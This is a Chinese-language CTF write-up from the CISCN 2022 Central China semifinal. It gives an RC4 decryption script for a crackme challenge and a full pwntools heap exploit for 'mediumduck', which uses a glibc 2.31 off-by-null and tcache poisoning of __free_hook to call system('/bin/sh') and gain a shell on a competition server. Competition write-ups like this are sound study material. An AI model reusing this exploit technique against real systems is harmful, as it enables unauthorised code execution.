ciscn2022 华中赛区复赛部分wp

2022-06-25

ctf_wp

crackme2
mediumduck
感想

crackme2

简单的rc4加密

key = list(b"happygame")
key_len = len(key)
cypherBytes = []
keyBytes = []
flag = []
encrypt=[0xCD,0x52,0x74,0x7A,0x1E,0x8,0x8,0xE0,0x57,0x3B,0x18,0x99,0xAF,0x3D,0x1D,0x94,0x15,0x25,0x67,0x5B,0x64,0x53,0x1F,0x3B,0xDC,0xA2,0x46,0x36,0xD3,0xFD,0xBE,0x33]
for i in range(256):
    cypherBytes.append(i)
    keyBytes.append(key[i%key_len])

jump = 0
for i in range(256):
    jump = cypherBytes[i] + jump + keyBytes[i] & 0xFF
    tmp = cypherBytes[i]
    cypherBytes[i] = cypherBytes[jump]
    cypherBytes[jump] = tmp
print(cypherBytes,keyBytes)

i=0
v3_2 =0
for x in range(32):
    i = i+1&0xff
    tmp = cypherBytes[i]
    v3_2 = v3_2 + tmp + 0x88 & 0xFF
    t = (cypherBytes[v3_2] + tmp & 0xFF)
    cypherBytes[i] = cypherBytes[v3_2]
    cypherBytes[v3_2] = tmp
    flag.append(encrypt[x]^cypherBytes[t])

print(bytes(flag))

mediumduck

glibc2.31的off by null题型(个人感觉这次复赛的题目全tm是缝合怪？)
先泄露heap基址和libc基址，然后overlap伪造一个堆并释放，使我们有能力控制tcache链表，将tcache链表设置成free_hook的地址，2.31并没有对此做check，但是要注意一点的是要额外free一个chunk，使得tcache记载的chunk为2，否则修改链表没有意义。

from pwn import *
io=remote("10.75.1.25",58011)
#io= process("./pwn",env={"LD_PRELOAD":"./libc.so.6"})
#io= process("./pwn")
#libc = ELF("./libc.so.6")

libc = ELF("libc.so.6")
def add():
    io.sendlineafter("Choice: ",str(1))

def delete(index):
    io.sendlineafter("Choice: ",str(2))
    io.sendlineafter("Idx: ",str(index))

def show(index):
    io.sendlineafter("Choice: ",str(3))
    io.sendlineafter("Idx: ",str(index))

def edit(index,size,content):
    io.sendlineafter("Choice: ",str(4))
    io.sendlineafter("Idx: ",str(index))
    io.sendlineafter("Size: ",str(size))
    io.sendafter("Content: ",content)

for i in range(15):
    add()
for i in range(7): #put into tcache
    delete(i)
add()
show(0)
io.recvline()
heap_base = u64((io.recv(6)).ljust(8,b"\x00"))-0x7a0
log.success("heap_addr:"+hex(heap_base))
# pause()
delete(0)
delete(8)
delete(9)
delete(7)

for i in range(10):
    add()
for i in range(7):
    delete(i)
show(8)
io.recvline()
libc_base = u64((io.recv(6)).ljust(8,b"\x00"))-0x1ecb80-0x60
log.success("libc:"+hex(libc_base))
libc.address= libc_base

edit(7,0x20,p64(0)+p64(0x1f1)+p64(heap_base+0x9a0)+p64(heap_base+0x9a0))
edit(8,0xf8,b"a"*0xf0+p64(0x1f0))
delete(9)

for i in range(7):
    add()
add()#put 9 into tcache
delete(0)
delete(9)
edit(7,0x20,p64(0)+p64(0x100)+p64(libc.sym["__free_hook"])+p64(heap_base+0x10))
add()#0
add()#9 free_hook
edit(9,8,p64(libc.sym["system"]))
edit(0,8,b"/bin/sh\x00")
delete(0)
io.interactive()

感想

半年前来打比赛比现在做得多（😂，这题目质量，真的是不好评价，pwn题只有heap，其他啥都没有）